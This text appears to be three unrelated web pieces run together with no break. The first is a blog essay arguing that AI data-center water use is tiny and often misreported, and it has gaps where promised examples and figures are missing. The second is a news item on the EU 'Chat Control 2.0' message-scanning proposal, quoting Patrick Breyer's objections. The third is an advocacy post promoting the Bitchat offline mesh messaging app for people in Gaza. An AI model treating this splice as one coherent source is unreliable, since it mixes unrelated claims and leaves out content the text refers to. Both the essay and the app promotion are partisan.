In low water scarcity areas, data centers can actually benefit water access, because there water isn’t zero sum. More people buying water doesn’t lead to higher prices, it gives the utility more money to spend on drawing more water and improve infrastructure. It’s the same reason grocery prices don’t go up when more people move to a town. More people shop at the grocery store, which allows the grocery store to invest more in getting food, and they make a profit they can use to upgrade other services, so on net more people buying from a store often makes food prices fall, not rise. Studies have found that utilities pumping more water, on average, causes prices to fall, not rise .

In high water scarcity areas, city and state leaders have already thought a lot about water management. They can regulate data centers the same ways they regulate any other industries. Here water is more zero sum, but data centers just end up raising the cost of water for other private businesses, not for homes. Data centers are subject to the economics of water in high scarcity areas, and often rely more on air cooling rather than water cooling because the ratio of electric costs to water costs is lower.

This seems fine if we think of data centers as any other industry. Lots of industries in America use water. AI is using a tiny fraction compared to most, and generating way, way more revenue per gallon of water consumed than most. Where water is scarce, AI data centers should be able to bid against other commercial and industrial businesses for it. So far, I haven’t seen any arguments against building data centers in high water stress areas that aren’t basically saying “we shouldn’t have any industries at all in places with high water stress” which seems wrong. People still choose to live in places like Phoenix and expect to have strong local governments that need a big tax base to function well. If you’re against industry in high water stress areas period, you need to be against people living in Phoenix in the first place, which means their water bills should probably rise anyway.

There are many cases of data centers being built, providing lots of tax revenue for the town and water utility, and the locals benefiting from improved water systems. Critics often read this as “buying off” local communities, but there are many instances where these water upgrades just would not have happened otherwise. It’s hard not to see it as a net improvement for the community. If you believe it’s possible for large companies using water to just make reasonable deals with local governments to mutually benefit, these all look like positive-sum trades for everyone involved.

Here are specific examples:

I could go on like this for a while. Maybe you think every one of these is some trick by big tech to buy off communities, but all I’m seeing here is an improvement in local water systems without any examples of equivalent harm elsewhere

AI data centers are not a notable source of water quality pollution in their host communities. Their cooling water is typically kept in closed loops, any periodic blowdown is routed to a sanitary sewer for treatment or discharged under numeric permit limits, and an increasing share of facilities use highly treated recycled water that would otherwise be released by wastewater plants. By contrast, the largest water quality problems in the United States come from sectors like agriculture and construction.

The EPA’s national assessments repeatedly identify agriculture as the leading source of impairment for rivers and streams due to nutrient and sediment runoff, with continued nitrogen and phosphorus problems that affect drinking water and coastal ecosystems. Construction activity is also a well documented source of sediment discharges if not controlled . Data centers are not flagged by EPA in these national problem lists , and they do not handle the kinds of process chemicals or waste streams that typify the industrial categories with effluent guidelines.

This makes sense when you think about it. Data centers are just big computers. Water just runs through them to cool them, in the same way your laptop needs to be cooled by a fan. Why would using water to cool a big computer significantly pollute the water? You want the water interfering with the physical material of the big computer as little as possible.

Data centers have an impact on local water systems, just like any other private industry. They shouldn’t just randomly be built anywhere. Local communities should consider the costs and benefits. But in doing this, they need to consider the actual amounts of water data centers will use compared to other normal industries, not compared to individual lifestyles.

Obviously, questions about electricity or pollution are real and should be considered separately, but at least in terms of water, I can’t find a single example where data center operations have harmed local water access in any way, many places where they’ve benefited local water access, and a universal pattern of huge tax revenues.

I think a lot of people don’t realize how much water we each use every day. Altogether, the average person’s daily water footprint is 422 gallons, or 1600 liters . This is mostly from agriculture to grow our food, manufacturing products we use, and generating electricity. Only a small fraction is the water we use in our homes.

Our best current data on AI prompts’ water use from a thorough study by Google, which says that each prompt might only use ~2 mL of water if you include the water used in the data center as well as the offsite water used to generate the electricity.

This means that every single day, the average American uses enough water for 800,000 chatbot prompts. Each dot in this image represents one prompt’s worth of water. All the dots together represent how much water you use in one day in your everyday life (you’ll have to really zoom in to see them, each of those rectangles is 10,000 dots):

However, that 2 mL of water is mostly the water used in the normal power plants the data center draws from. The prompt itself only uses about 0.3 mL , so if you’re mainly worried about the water data centers use per prompt, you use about 300,000 times as much every day in your normal life. That’s the same water your local power plant uses to generate a watt-hour of energy, enough to use your laptop for about 2 minutes. So every hour that you use your laptop, you’re using up 30 chatbot prompt’s worth of water in a nearby power plant.

Have you ever worried about how much water things you did online used before AI? Probably not, because data centers use barely any water compared to most other things we do. Even manufacturing most regular objects requires lots of water. Here’s a list of common objects you might own, and how many chatbot prompt’s worth of water they used to make ( all from this list , and using the onsite + offsite water value):

  • Leather Shoes - 4,000,000 prompts’ worth of water

  • Smartphone - 6,400,000 prompts

  • Jeans - 5,400,000 prompts

  • T-shirt - 1,300,000 prompts

  • A single piece of paper - 2550 prompts

  • A 400 page book - 1,000,000 prompts

If you want to send 2500 ChatGPT prompts and feel bad about it, you can simply not buy a single additional piece of paper. If you want to save a lifetime supply’s worth of chatbot prompts, just don’t buy a single additional pair of jeans.

Because generating electricity in America often involves water, anything that you do that uses electricity often also uses water. The average water used per kWh of electricity in America is 4.35 L/kWh , according to the Lawrence Berkeley National Laboratory. This has a few weird assumptions ( explained here ), so to be conservative I’ll divide it in half to 2 L/kWh. This means that every kWh of electricity you use evaporates the same amount of water as 1000 chatbot prompts (including both onsite + offsite water cost). Conveniently, 1 prompt’s water per Watt-hour.

Here are some common ways you might use electricity, and how many AI prompts’ worth of water the electricity used took to generate:

If you want to reduce your water footprint, avoiding AI will never make a dent. These numbers are so incredibly small it’s hard to find things to compare them to. If you send 10,000 chatbot prompts per year, the water used in AI data centers themselves adds up to 1/300,000th of your total water footprint. If your annual water footprint were a mile, 10,000 chatbot prompts would be 0.2 inches.

Even if AI is completely useless, and all the water you use on it is “wasted,” literally everything else you do in life involves larger amounts of wasted water, even if that activity is really valuable for you. If you boil water to make healthy food, you could make the exact same amount of food if you took a water dropper and extracted a few milliliters from the pot. A medium-sized pot can hold ~10 liters of water. That’s enough for 5000 chatbot prompts. If you took a dropper and removed 1/5000th of the water from the pot, you would still be able to use it to make whatever food you want, so that extra amount is “wasted” but it’s so small that it doesn’t matter at all. If you saw someone filling a pot like this:

and then using this dropper to remove tiny amounts of water at a time to “save” as much water as they could until the pot only contained exactly as much water as they needed so that they didn’t waste a drop,

you would correctly say that was a huge waste of time. In no other places do we think it’s reasonable to worry about “wasting” such a tiny amount of water in our personal lives. Even if you think all water used on AI is completely wasted, it still shouldn’t bother you any more than the fact that people don’t spend the time to remove tiny drops of water from the pots they boil to make food.

None of what I’m going to list here is generative AI like ChatGPT, but other machine learning tools have been heavily benefited by spillover effects from the general economic success of generative AI tools. These tools include things like computer vision systems for manufacturing quality control, predictive maintenance algorithms for industrial equipment, recommendation engines for e-commerce, fraud detection systems for financial services, and optimization algorithms for logistics and supply chains. While these applications have existed for years, the massive investment flowing into AI infrastructure (data centers, chip manufacturing, training talent) has made them cheaper, faster, and more accessible to deploy at scale.

AI is a way to get a machine to build its own soup of internal heuristics for how to handle complex situations. This soup of heuristics both succeeds and fails in surprising ways. We don’t design the heuristics themselves, and don’t even know what they are or how they work, in the same way we don’t know how a lot of the heuristics in our own brains work. There are a lot of situations where deploying this type of machine can help us optimize water use, because there are lots of places in America and around the world where huge amounts of water is wasted. Almost 20% of U.S. drinking water is lost to leaking pipes before reaching consumers .

This was the result of a few minutes of Googling. I could go on way longer with more examples of ways simple AI tools are saving towns huge amounts of water.

Many people’s background aversion to using water on data centers is that it’s a physical resource being spent on a digital product. Shouldn’t we only spend physical goods on other physical goods?

We already use a lot of water on the internet, and digital goods in general. Most of the ways we generate electricity uses a lot of water, so most of the time, when you’re using a computer, TV, or phone, you’re also using water. Internet data centers have always relied on water cooling, so we were always using water to access and share digital information.

Information is valuable. The real value of a book is almost entirely in the words it contains, not the physical quantity of ink and paper that make it up. We think it’s valuable to spend lots and lots of physical resources each year making books. Books and newspapers use 153 billion gallons of water annually . This is almost entirely in the service of delivering information. If it’s okay to spend water on creating and distributing books, it’s okay to spend water on other sources of valuable information. The water used to deliver digital information is orders of magnitude lower than physical books.

You might object that AI does not deliver anything like the value of books. My point isn’t to make a claim about how much valuable information AI provides, only that it isn’t inherently bad to spend a physical resource to deliver information. Ultimately if you believe AI is entirely valueless, than any water used on it is wasted regardless of whether AI’s output is physical or digital. But the fact that it’s digital on its own shouldn’t factor into whether you think it’s valuable or not.

A very common point that comes up in conversations about AI and water use is that no matter how little water AI uses, AI is either useless or actively harmful, so all that water is being used on something bad. This makes it inherently worse than using any large amounts of water on good things. For example, when I share these stats from before:

Here’s a list of common objects you might own, and how many chatbot prompt’s worth of water they used to make ( all from this list , and using the onsite + offsite water value):

  • Leather Shoes - 4,000,000 prompts’ worth of water

  • Smartphone - 6,400,000 prompts

  • Jeans - 5,400,000 prompts

  • T-shirt - 1,300,000 prompts

  • A single piece of paper - 2550 prompts

  • A 400 page book - 1,000,000 prompts

I often get the response that all of these things have social value, whereas AI has no value, so AI is worse for water than all these things, even though it’s using tiny tiny tiny amounts of water compared to each.

It seems like some people measure how wasteful something is with water is by a simple (Value to society / Water) equation where no matter how tiny something’s water use is, if it’s negative value, it’s always worse than something okay with huge water use.

This doesn’t make sense as a way of thinking about conserving water, for the same reason that it’s not a good way of thinking about saving money. If I were doing a fun activity that cost $40,000, and something useless or bad that cost $0.01, even though the $0.01 thing was bad, cutting it just would never ever be as promising or urgent as finding ways to reduce the cost of the $40,000 thing, or to just go without it.

Driving somewhere I want to be is much worse for the environment than riding a bike in the wrong direction. I agree that we need to factor in the value somehow, but it can’t just be “Anything socially bad is always worse for the environment than anything socially good.” AI water is often hundreds of thousands of times as small as many other ways we use water.

Talking about the social harm of a tool and adding “And it uses a few drops of water!” basically always dilutes the point you’re trying to make. I’m not exactly consistently pro AI . There’s a lot I’m worried about. But I find it distasteful when people effectively say “This far-right authoritarian government is using powerful AI systems to surveil people!… and also, every time they use it, a few drops of water are evaporated!” This just so obviously dilutes and trivializes the much more important point that I’d really rather it not be brought up. Manufacturing a gun uses at minimum 10,000 times as much water as an AI prompt in a data center , but if authoritarians are bearing down on people, I’m not going to add “And it cost a glass of water each to make their guns!'“

Data centers don’t have to use water for cooling, they can also circulate cold air. They do this much more often when they’re built in deserts, because water’s more expensive and solar power’s cheaper and more abundant. As with any industry, they respond to the costs of goods and adjust how they use them accordingly.

But replacing water with air cooling systems means a lot more energy is used on cooling. Circulating cool air is more energy intensive than circulating water. Because water has much higher heat capacity and thermal conductivity than air, it can absorb and transfer heat more efficiently. Air cooling (especially in hot climates) requires stronger fans, chillers, compressors, and mechanical systems to push cooled air throughout the facility.

One study found that replacing air cooling with liquid cooling reduces a data center’s total power usage by 10% . This is a big deal, because electricity demand is a much more serious problem for data centers. Using 10% less energy also means roughly 10% less CO2 emissions. If water usage isn’t an issue, it seems like the main effect of water cooling is preventing a significant amount of CO2 emissions and electricity demand.

This is the single most influential article ever written about ChatGPT and the environment. I still to this day regularly bump into people who think that ChatGPT uses a whole bottle of water every time you prompt it.

Friend of the blog SE Gyges has written the best thorough explanation of why this article looks likely to be an intentional lie. I’d recommend the entire thing . The article concludes that the only way this number could possibly be real is if you make every one of the following assumptions:

For a worst-case estimate using the paper’s assumptions, if

  • you query ChatGPT 10 times per email,

  • you include water used to generate electricity,

  • the datacenter hosting it is in the state of Washington,

  • the datacenter uses the public power grid or something close to it,

  • water evaporated from hydroelectric power reservoirs could otherwise have been used productively for something other than power generation,

  • and LLMs were not more efficient when they were being sold for profit in 2024 than they were in 2020 when they had never been used by the public

then it is true that an LLM uses up 500 or more milliliters of water per email.

You can reach a similar estimate by different methods, since they break out the water use per state differently. For example, if the datacenter hosting ChatGPT is not in Washington, it will have a higher carbon footprint but a lower water footprint and you will have to query it 30 or 50 times to use up an entire bottle of water. This is not what anyone imagines when they hear “write a 100-word email”.

That study’s authors are well aware that none of these assumptions are realistic. Information about how efficient LLMs are when they are served to users is publicly available. People do not generally query an LLM fifty times to write a one hundred word email.

It is completely normal to publish, in an academic context, a worst-case estimate based on limited information or to pick assumptions which make it easy to form an estimate. In this setting your audience has all the detail necessary to determine if your worst-case guess seems accurate, and how to use it well.

Publishing a pessimistic estimate that makes this many incorrect assumptions in a newspaper of record with no further detail is just lying to readers.

Take this one from the Economic Times, it circulated a lot:

The article clarifies that this is 463 million gallons of water spread over 2 years, or 640,000 gallons of water per day. Texas consumes 13 billion gallons of waters per day . So all data centers added 0.005% to Texas’s water demands.

0.005% of Texas’s population is 1,600. Imagine a headline that said “1,600 people moved to Texas. Now, residents are being asked to take shorter showers.”

Many iterations of the same article appeared:

One article corrected for the much larger uptick of data centers in 2025:

50 billion gallons per year is a lot more! That’s more like 1.1% of Texas’s water use. Nowhere in this article does it share that proportion. It seems pretty normal for a state as large as Texas to have a 1% fluctuation in its water demand.

From the New York Times:

The subtitle says: “In the race to develop artificial intelligence, tech giants are building data centers that guzzle up water. That has led to problems for people who live nearby.”

Reading it, you would have to assume that the main data center in the story is guzzling up the local water in the way other data centers use water.

In the article, residents describe how their wells dried up because residue from the construction of the data center added sediment to the local water system. The data center had not been turned on yet. Water was not being used to cool the chips. This was a construction problem that could have happened with any large building. It had nothing to do with the data center draining the water to cool its chips. The data center was not even built to draw groundwater at all, it relies on the local municipal water system .

The residents were clearly wronged by Meta here and deserve compensation. But this is not an example of a data center’s water demand harming a local population. While the article itself is relatively clear on this, the subtitle says otherwise!

The rest of the article is also full of statistics that seem somewhat misleading when you look at them closely.

Water troubles similar to Newton County’s are also playing out in other data center hot spots, including Texas, Arizona, Louisiana and the United Arab Emirates. Around Phoenix, some homebuilders have paused construction because of droughts exacerbated by data centers.

The term “exacerbated” is doing a lot of work here. If there is a drought happening, and a data center is using literally any water, then in some very technical sense that data center is “exacerbating” the drought. But in no single one of these cases did data centers seem to actually raise the local cost of water at all. We already saw in Phoenix that data centers were only using 0.12% of the county water. It would be odd if that was what caused home builders to pause.

The article goes on with some ominous predictions about Georgia’s water use around the data center, but so far residents have not seen their water bills rise at all. We’re good at water economics! You wouldn’t know that at all from reading this article.

I think the main story being an issue with construction, but the title associating it with some issue specific to data centers, seems pretty similar to a news story reporting on loud sounds from construction of a building that happens to be a bank, and the title saying “Many banks are known for their incredible noise pollution. Some residents found out the hard way.” This would leave you with an incorrect understanding of banks.

Contra the subtitle, data centers “guzzling up water” in the sense of “using the water for cooling” has not led to any problems, anywhere, for the people who live nearby. The subtitle is a lie.

This same story was later referenced by a long article on AI water use at CNET , here with a wildly misleading framing:

The developer, 1778 Rich Pike, is hoping to build a 34-building data center campus on 1,000 acres that spans Clifton and Covington townships, according to Ejk and local reports. That 1,000 acres includes two watersheds, the Lehigh River and the Roaring Brook, Ejk says, adding that the developer’s attorney has said each building would have its own well to supply the water neededEverybody in Clifton is on a well, so the concern was the drain of their water aquifers, because if there’s that kind of demand for 34 more wells, you’re going to drain everybody’s wells,” Ejk says. “And then what do they do?”

Ejk, a retired school principal and former Clifton Township supervisor, says her top concerns regarding the data center campus include environmental factors, impacts on water quality or water depletion in the area, and negative effects on the residents who live there.

Her fears are in line with what others who live near data centers have reported experiencing. According to a New York Times article in July, after construction kicked off on a Meta data center in Social Circle, Georgia, neighbors said wells began to dry up, disrupting their water source.

There’s no mention anywhere in the article that the data center in Georgia was not using the well water for normal operations.

Here’s a popular Bloomberg story from May . It shows this graphic:

Red dots indicate data centers built in areas with higher or extremely high water stress. My first thought as someone who lives in Washington DC was “Sorry, what?”

Northern Virginia is a high water stress area?

I cannot find any information online about Northern Virginia being a high water stress area. It seems to be considered low to medium. Correct me if I’m wrong. Best I could do was this quote from the Financial Times:

Virginia has suffered several record breaking dry-spells in recent years, as well as a “high impact” drought in 2023, according to the U.S. National Integrated Drought Information System. Much of the state, including the northern area where the four counties are located, is suffering from abnormally dry conditions, according to the U.S. Drought Monitor. But following recent rain, the Virginia Department of Environmental Quality on Friday lifted drought advisories across much of the state, though drought warnings and watches are still in effect for some regions.

Back to the map. There were some numbers shared in a related article by one of the same authors . But readers were left without a sense of proportion of what percentage of our water all these data centers are using.

AI’s total consumptive water use is equal to the water consumption of the lifestyles of everyone in Paterson, New Jersey. This graphic is effectively spreading the water costs of the population of Paterson across the whole country, and drawing a lot of scary red dots. The dots are each where a relatively tiny, tiny amount of water is being used, and they’re only red where the regions are struggling with water. This could be done with anything that uses water at all and doesn’t give you any useful information about how much of a problem they are for the region’s water access.

Even the title chart can send the wrong message.

I think for a lot of people, stories about AI are their first time hearing about data centers. But the vast majority of data centers exist to support the internet in general, not AI.

Simply showing the number of data centers doesn’t show the impact of AI specifically, or how much power data centers are drawing. Power roughly correlates with water, because the more energy is used in data center computers, the more they need to be cooled, and the more water is needed to do that. Here’s a graph showing the power demand of all data centers, and how much of that demand AI makes up.

Obviously there’s been a big uptick on power draw since 2019, but AI is still a small fraction of total data center power draw. I think Goldman Sachs underestimated AI’s power draw here, experts think it’s more like ~15% of total power used in data centers , but it’s important to understand that the vast majority of that original scary red data center graph isn’t AI specifically.

AI is going to be large part of the very large data center buildout that’s currently underway, but it’s important to understand that up until this point most of those data centers on the graph were just the buildout of the internet.

One more note, circling back again to Maricopa County.

The county is a gigantic city built in the middle of a desert. For as long as it’s existed, it’s been under high water stress. Everyone living there is aware of this. The entire region is (I say this approvingly) a monument to man’s arrogance .

The only reason anyone can live in Phoenix in the first place is that we have done lots of ridiculous massive projects to move huge amounts of water to the area from elsewhere.

This is an area where environmentalism and equity come apart. I’d like residents of Phoenix to have access to reliable water supplies, but I don’t think this the most environmentalist move. I think the most environmentalist move would probably be to encourage people to leave the Phoenix area in the first place and live somewhere that doesn’t need to spend over two times as much energy as the country on average pumping water. I have to bite the bullet here and say that between environmentalism and equity, I’d rather choose equity and not raise people’s water prices much, even though they’ve chosen to live in the middle of a desert.

It seems inconsistent to think that it’s wrong for environmentalist reasons to build data centers near Phoenix that increase the city’s water use by 0.1%, but it’s not wrong for Phoenix to exist in the first place. If it’s bad for the environment to build data centers in the area at all, Phoenix’s low water bills themselves seem definitionally bad for the environment too. I think you can be on team “Keep Phoenix’s water bills low, and build data centers there” or team “Neither the data centers nor Phoenix should be built there, we need to raise residents’ water bills to reflect this fact” but those are the only options. I’m on team build the data centers and help out the residents of Phoenix.

More Perfect Union is one of the single largest sources of misleading ideas about data center water usage anywhere. They very regularly put out wildly misleading videos and headlines. There are so many that I’ve written a long separate post on them here . They are maybe the single most deceptive media organizations in the conversation relative to their reach.

Many articles choose to report AI’s water use this way:

“AI is now using as much as (large number) of homes.”

Take this quote from Newsweek :

In 2025, data centers across the state are projected to use 49 billion gallons of water, enough to supply millions of households , primarily for cooling massive banks of servers that power generative AI and cloud computing.

That sounds bad! The water to supply millions of homes sounds like a significant chunk of the total water used in America.

The vast majority (~93%) of our individual total consumption of freshwater resources does not happen in our homes, it happens in the production of the food we eat . Experts seem to disagree on exactly what percentage of our freshwater consumption happens in our homes, but it’s pretty small. Most estimates seem to land around 1%. So if you just look at the tiny tiny part of our water footprint that we use in our homes, data centers use a lot of those tiny amounts. But if you look at the average American’s total consumptive water footprint of ~1600 L/day, 49 billion gallons per year is about 300,000 people’s worth of water. That’s about 1% of the population of Texas. The entire data center industry (both for AI and the internet) using as much water as 1% of its population just doesn’t seem as shocking.

A move that I complained about in my last post is that a lot of articles will imply that AI companies are hiding the “true, real” water costs of data centers by only reporting the “onsite” water use (the water used by the data center) and not the “offsite” water use (the water used in nearby power plants to generate the electricity). Reporting both onsite and offsite water costs has become standard in reporting AI’s total water impact.

Many authors leave their readers hanging about what these “true costs” are. They’ll report a minuscule amount of water used in a data center, and it’s obvious to the reader that it’s too small to care about, but then the author will add “but the true cost is much higher” and leaves the reader hanging, to infer that the true cost might matter.

We actually have a pretty simple way of estimating what the additional water cost of offsite generation is. Data centers on average use 0.48 L of water to cool their systems for every kWh of energy they use, and the power plants that provide data centers energy average 4.52 L/kWh . So to get a rough estimate:

  • If you know the onsite water used in the data center, multiply it by 10.4 to get the onsite + offsite water.

  • If you know the onsite energy used, multiply it by 5.00 L/kWh to get the onsite + offsite water used.

Obviously scaling up a number by a factor of 10 is a lot, but it often still isn’t very much in absolute terms. Going from 5 drops for a prompt to 50 drops of water is a lot relatively, but in absolute terms it’s a change from 0.00004% of your daily water footprint to 0.0004% . Journalists should make these magnitudes clear instead of leaving their readers hanging.

Let’s say there are 2 data centers in a town (I’ll call them Poseidon and Enki ) drawing from the same power source. The local town’s electricity costs 4 L of water per kWh to generate.

The Poseidon data center is pretty wasteful with its cooling water. It spends 2 L of water on cooling for every kWh it uses on computing, way above the national average of 0.48L/kWh . So if you add the onsite and offsite water usage, Poseidon uses 6 L of water per kWh.

The Enki data center finds a trick to be way more efficient with its cooling water. It drops its water use down to 0.1L/kWh. Well below the national average. So if you add its onsite and offsite water usage, it uses 4.1 L per kWh without using any more energy.

Obviously, the Enki data center is much better for the local water supply.

Both data centers are asked by the town to release a report on how much water they’re using. They both choose to only report on the water they’re actually using in the data center itself.

Suddenly, a local newspaper shares an expose: both data centers are secretly using more water than they reported, but Enki’s secret, real water use is 41x its reported water costs.

While Poseidon’s is only 3x its reported water costs:

Here, Enki looks much more dishonest than Poseidon. If readers only saw this proportion, they would probably be left thinking that Enki is much worse for the local water supply. But this is wrong! Enki’s much better. The reason the proportions are so different is that Enki’s managed to make its use of water so efficient compared to the nearby power plant.

I think something like this often happens with data center water reporting.

When I wrote about a case of Google’s “secret, real water cost” actually not being very much water , a lot of people messaged me to say Google still looks really dishonest here, because the secret cost is 10x its stated water costs once you add the offsite costs. A way of reframing this is to say that Google’s made its AI models so energy efficient that they’re now only using 1/10th as much water in their data centers per kWh as the water required to generate that energy. This seems good! We should frame this as Google solidly optimizing its water use.

Take this quote from a recent article titled “ Tech companies rarely reveal exactly how much water their data centers use, research shows ”:

Sustainability reports offer a valuable glimpse into data center water use. But because the reports are voluntary, different companies report different statistics in ways that make them hard to combine or compare. Importantly, these disclosures do not consistently include the indirect water consumption from their electricity use, which the Lawrence Berkeley Lab estimated was 12 times greater than the direct use for cooling in 2023. Our estimates highlighting specific water consumption reports are all related to cooling.

The article should have mentioned that this means data centers have made their water use so efficient that basically the only water they’re using at all is in the nearby power plant, not in the data centers themselves. But framing it in the original way way make it look like the AI labs are hiding a massive secret cost from local communities, which I guess is a more exciting story.

If you use literally any water in any area with a drought, you’re in some sense “straining the local water system” and “exacerbating the drought.” Both of these tell us basically nothing meaningful about how bad a data center is for a local water system. If an article doesn’t come with any clarification at all about what the actual expected harms are, I would be extremely wary of this language. In basically every example I can find where it’s used, the data centers are adding minuscule amounts of water demand to the point that they’re probably not changing the behavior of any individuals or businesses in the area.

This is the great singular sin of bad climate communication. The second you see it, you should assume it’s misleading. Simply reporting “millions of gallons of water” without context gives you no information. The power our digital clocks draw use millions of gallons of water, but digital clocks aren’t causing a water crisis.

Take this example:

7.2 million gallons per year! Sounds like a ton. How much is that? This data center would represent about 0.02% of nearby El Paso’s water usage . Probably not nearly as much as this tweet is trying to get across.

Whenever you see an article cite a huge amount of water with no comparisons at all to anything to give you a proper sense of proportion, ask a chatbot to contextualize the number for you.

Take this excerpt from “ Are data centers depleting the Southwest’s water and energy resources?

Meta’s data centers, meanwhile, withdrew 1.3 billion gallons of water in 2021 , 367 million of which were from areas with high or extremely high water stress. Total global water consumption from Meta’s data centers was over 635 million gallons, equivalent to about 6,697 U.S. households. It’s not clear how much of this water withdrawal occurs in the United States, although that’s where most of Meta’s data centers are located. Neither report reveals the specific water use of the company’s Arizona data center.

I’m going to rewrite this, but using my town of 16,000 people (Webster, Massachusetts) as a unit to measure Meta’s data center withdrawal instead of individual households. Webster’s utility delivers 1.4 million gallons of water per day to the citizens and businesses there (511 million gallons per year).

Meta’s data centers, meanwhile, withdrew as much water as 3 Massachusetts small towns in 2021. Two thirds of a single one of those small towns was in areas with high or extremely high water stress. Total global water consumption from Meta’s data centers was a little more than a single Massachusetts small town. It’s not clear how much of this water withdrawal occurs in the United States, although that’s where most of Meta’s data centers are located. Neither report reveals the specific water use of the company’s Arizona data center.

This all seems silly when you consider Meta’s one of the single largest internet companies.

Many articles about current or future AI data centers report how much water they use

When a data center is being built, the company needs to obtain water use permits from local authorities before construction. At this stage, they have to estimate their maximum possible water consumption under worst-case scenarios:

  • All cooling systems running at full capacity

  • Peak summer temperatures

  • Maximum IT load (every server rack filled and running)

  • Minimal efficiency from cooling systems

The permit needs to cover this theoretical maximum because regulators want to ensure the local water infrastructure can handle the demand and that there’s enough water supply for everyone. It’s easier to get a higher permit upfront than to come back later and request more, so data centers are incentivized to aim high.

Actual water usage is always significantly lower than what the permits allow, because they’re designed with the absolute worst conditions in mind. But many popular articles about how much water data centers use give the number on the water permit, not how much the data center actually uses.

Here’s one of many examples :

Duff is the only city council member to vote no on a recently approved $800 million data center - rumored to be for Facebook - after discovering the facility would eventually use 1.75 million gallons of water every day for cooling their rows of servers once fully operational.

Discussion about this post

Not even a month passed and Chat Control is back in the EU

Hacker News
reclaimthenet.org
2025-11-14 17:54:07
Comments...
Original Article

A major political confrontation over online privacy is approaching as European governments prepare to decide on “ Chat Control 2.0, ” the European Commission’s revised proposal for monitoring private digital communications.

The plan, which could be endorsed behind closed doors, has drawn urgent warnings from Dr. Patrick Breyer, a jurist and former Member of the European Parliament, who says the draft conceals sweeping new surveillance powers beneath misleading language about “risk mitigation” and “child protection.”

In a release sent to Reclaim The Net, Breyer, long a defender of digital freedom, argues that the Commission has quietly reintroduced compulsory scanning of private messages after it was previously rejected.

He describes the move as a “deceptive sleight of hand,” insisting that it transforms a supposedly voluntary framework into a system that could compel all chat, email, and messaging providers to monitor users.

“This is a political deception of the highest order,” Breyer said.

“Following loud public protests, several member states, including Germany, the Netherlands, Poland, and Austria, said ‘No’ to indiscriminate Chat Control. Now it’s coming back through the back door disguised, more dangerous, and more comprehensive than ever. The public is being played for fools.”

Under the new text , providers would be obliged to take “all appropriate risk mitigation measures” to prevent abuse on their platforms. While the Commission presents this as a flexible safety requirement, Breyer insists it is a loophole that could justify forcing companies to scan every private message, including those protected by end-to-end encryption.

“The loophole renders the much-praised removal of detection orders worthless and negates their supposed voluntary nature,” he said.

He warns that it could even lead to the introduction of “client-side scanning,” where users’ devices themselves perform surveillance before messages are sent.

Unlike the current temporary exemption known as “Chat Control 1.0,” which allows voluntary scanning of photos and videos, the new draft would open the door to text and metadata analysis. Algorithms and artificial intelligence could be deployed to monitor conversations and flag “suspicious” content.

Breyer notes that such automated scrutiny cannot interpret context and risks sweeping up ordinary exchanges. “No AI can reliably distinguish between a flirt, sarcasm, and criminal ‘grooming’,” he said. “Imagine your phone scanning every conversation with your partner, your daughter, your therapist, and leaking it just because the word ‘love’ or ‘meet’ appears somewhere. This is not child protection, this is a digital witch hunt.”

According to Breyer, the existing voluntary system has already proven flawed, with German police reporting that roughly half of all flagged cases turn out to be irrelevant.

The proposal also carries major implications for identity and anonymity online. A new requirement would force users to verify their age before creating accounts on messaging or email platforms, an obligation that would likely require official ID or biometric checks.

Breyer argues that such measures effectively abolish anonymous communication. “This is the de facto end of anonymous communication online, a disaster for whistleblowers, journalists, political activists, and people seeking help who rely on the protection of anonymity,” he said.

He also condemned the provision restricting minors under 16 from using messaging and social media platforms with chat functions. “Digital isolation instead of education, protection by exclusion instead of empowerment, this is paternalistic, out of touch with reality, and pedagogical nonsense,” he warned, saying the measure risks cutting young people off from key channels of social and educational interaction.

Breyer is calling on EU governments that previously resisted mass surveillance, among them Germany, the Netherlands, Poland, Czechia, Luxembourg, Finland, Austria, and Estonia, to block the regulation in its current form.

“Now, these governments must show some backbone!” he urged. “Block this sham compromise in the Council and demand immediate corrections to save the fundamental rights of all citizens.”

He proposes a series of specific changes before any agreement should move forward: a guarantee that “risk mitigation” cannot be used to mandate scanning, a prohibition on AI-driven monitoring of text conversations, strict judicial oversight for targeted investigations, and the preservation of anonymous access to communication tools.

“They are selling us security but delivering a total surveillance machine,” Breyer concluded.

“They promise child protection but punish our children and criminalize privacy. This is not a compromise; this is a fraud against the citizen. And no democratic government should make itself an accomplice.”

Bitchat for Gaza – messaging without internet

Hacker News
updates.techforpalestine.org
2025-11-14 17:43:40
Comments...
Original Article

Bitchat is a new messaging app that allows users to chat securely with or without internet access. Download it today via the App Store or Google Play store to begin communicating safely, even when connectivity disappears.

Why Bitchat is needed

Palestinians are dependent on Israel for their access to electricity, telecoms, and internet routing. Israel has weaponized this dependence in Gaza by deliberately causing blackouts that have left Palestinians cut off from communicating with each other or with the outside world. The relentless bombing campaign has also destroyed or severely crippled any remaining communication infrastructure.

Even when Palestinians use regular communication methods, their conversations and messages can be monitored and recorded , leaving them exposed to surveillance and potential targeting.

The basic human right to communicate freely, and without interruption, has been denied to the Palestinian people.

The solution

Bitchat lets you keep messaging even when the internet or power is down. It connects phones directly through Bluetooth, and each phone helps pass messages along, allowing communication to stretch much farther than just your immediate area. Everything is fully encrypted so your conversations stay private.

When you do have internet or cell service, Bitchat can send your messages anywhere in the world using a network of relays. There is no central server that stores any of your data. You don’t need to create an account, share your phone number or email, or even have a SIM card to use it.

Staying connected when all else fails

Bitchat is an Israel-proof messaging alternative that continues to work even when traditional networks are shut down. The app also has “Geohash” channels that allows users to join location-based chats, so Palestinians can stay connected to their neighbors down the street or to the larger community in cities across the region.

This lets Palestinians check on the safety of loved ones, organize and coordinate within their communities, and share critical news and updates.

Validated by T4P

T4P has evaluated the app, testing it in various conditions, and looked at the technology and governance of the application. After this evaluation, T4P recognizes it as a secure and resilient communication tool for Palestinian communities when faced with internet disruptions or outages. In addition, Tech for Palestine community members are among BitChat’s top code contributors.

Bitchat has seen a surge in downloads in countries facing civil unrest like Nepal, Indonesia, Côte d'Ivoire, and most recently Madagascar. The Nepali government blocked access to all major social media platforms, forcing civilians to search for alternative methods of communication.

WhatsApp is known to expose private data, potentially to Israel – and these breaches have been used to target Palestinians . Communicating via WhatsApp or social media presents the risk of exposing private data, limiting free expression, and undermining user privacy. BitChat does not have the same vulnerabilities and does not allow Meta to help Israel surveil Palestinians.

Get started

You can start using Bitchat easily, without even creating an account. To start, download the app from the App Store or Google Play store .

Once installed, the first thing you should do is change the default @anon username at the top. Click on it to change.

The blue #mesh channel in the top right corner will indicate that you are active on your local bluetooth network. Next to it you will see an icon with the number of users connected within your network. Click on the icon and begin private conversations with users from the list.

